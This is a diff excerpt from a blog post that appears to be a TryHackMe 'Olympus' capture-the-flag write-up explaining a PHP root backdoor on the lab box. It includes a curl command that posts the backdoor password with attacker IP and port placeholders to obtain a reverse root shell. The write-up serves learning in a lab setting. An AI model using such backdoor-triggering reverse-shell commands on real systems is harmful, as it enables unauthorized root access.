tomfieber/tomfieber.github.io/_posts/2022-07-19-tryhackme-olympus.md

 [...]
 ```

 Alright...it looks like this is a root backdoor!
+This must be what Prometheus was blabbering about.
 Let's try to breakdown what's happening here in the first few lines of this code.

-> **Disclaimer:** I am by no means a professional PHP developer, so sorry if my explanation is a little off.
+>**Disclaimer:** I am by no means a professional PHP developer, so sorry if my explanation is a little off.

 So it looks like this application is listening for an HTTP POST request with the password in the body of the request, and the target (in this case, the attacker's) IP and PORT as GET parameters.
 We can leverage this backdoor with the following command.

 ```bash
 $ curl -X POST "http://$ip/0aB44fdS3eDnLkpsz3deGv8TttR4sc/VIGQFQFMYOST.php?ip=<ATTACKER IP>&port=<LISTEN PORT>" -H "Content-Type: application/x-www-form-urlencoded" -d "password=a7c5ffcf139742f52a5267c4a0674129"
 ```

+>**NOTE:** This can also be done by visiting the site in a web browser.
+I used curl for ease of illustration, but a browser would work just fine.
+You'll still have to include the attacker IP and listening port in the query string though.

 Which gets us a root shell!